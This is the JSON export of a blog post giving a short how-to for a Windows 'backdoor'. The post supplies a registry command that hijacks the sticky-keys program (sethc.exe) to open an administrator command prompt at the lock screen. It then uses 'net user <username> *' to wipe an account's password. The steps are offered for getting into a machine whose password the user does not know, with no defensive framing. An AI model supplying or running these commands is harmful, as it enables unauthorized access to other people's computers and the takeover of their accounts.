{"id":5940,"date":"2021-10-19T19:00:09","date_gmt":"2021-10-19T19:00:09","guid":{"rendered":"https:\/\/news4hacker.com\/?p=80"},"modified":"2023-04-19T07:55:31","modified_gmt":"2023-04-19T07:55:31","slug":"creating-backdoor-using-cmd-in-windows","status":"publish","type":"post","link":"https:\/\/reconcybersecurity.com\/blogs\/creating-backdoor-using-cmd-in-windows\/","title":{"rendered":"Create backdoor using cmd in windows | Recon Cyber Security"},"content":{"rendered":"\n<p class=\"has-text-align-center\"><br><em>How to create a backdoor in Windows<\/em> if you don&#8217;t know what is backdoor. The Backdoor is used to open a laptop, pc, or any system<em> if the user doesn&#8217;t know the password. So let&#8217;s start&#8230;<\/em><\/p>\n\n\n\n<p class=\"has-text-align-center\"><br><strong>Using cmd<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-left\"><strong><br><\/strong>\u2981 Open your cmd as administrator and type this command and hit enter\u2026<\/p>\n\n\n\n<p class=\"has-text-align-left\"><br>\u2981 ( REG ADD &#8220;HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe&#8221; \/v Debugger \/t REG_SZ \/d &#8220;C:\\windows\\system32\\cmd.exe&#8221; )<\/p>\n\n\n\n<p class=\"has-text-align-left\"><br>\u2981 Now click the shift key 5 times and your cmd will be opened\u2026<\/p>\n\n\n\n<p class=\"has-text-align-left\"><br>\u2981 Now lock your computer, and laptop and click the shift key 5 times now your cmd is opened type the command &#8220;net user&#8221; and your user name then press enter. Here you can erase the password of your account. So type (net user &lt;username&gt; *).<\/p>\n\n\n\n<p class=\"has-text-align-left\">Now hit enter again and your password will be removed. Cut your cmd and hit enter on your password box\u2026<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2021\/10\/Untitled-5-1024x523.png\" alt=\"\" class=\"wp-image-81\"\/><\/figure>\n\n\n\n<p class=\"has-text-align-center\">If you have any problem with our blog so you can comment us we will try to fix it. <\/p>\n","protected":false},"excerpt":{"rendered":"How to create a backdoor in Windows if you don&#8217;t know what is backdoor. The Backdoor is used&hellip;\n","protected":false},"author":1,"featured_media":10879,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[10,24],"tags":[63,64,65],"class_list":{"0":"post-5940","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hacking","8":"category-tricks","9":"tag-backdoor","10":"tag-backdoor-in-windows","11":"tag-crack-password"},"_links":{"self":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/5940","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/comments?post=5940"}],"version-history":[{"count":2,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/5940\/revisions"}],"predecessor-version":[{"id":10881,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/5940\/revisions\/10881"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/media\/10879"}],"wp:attachment":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/media?parent=5940"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/categories?post=5940"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/tags?post=5940"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}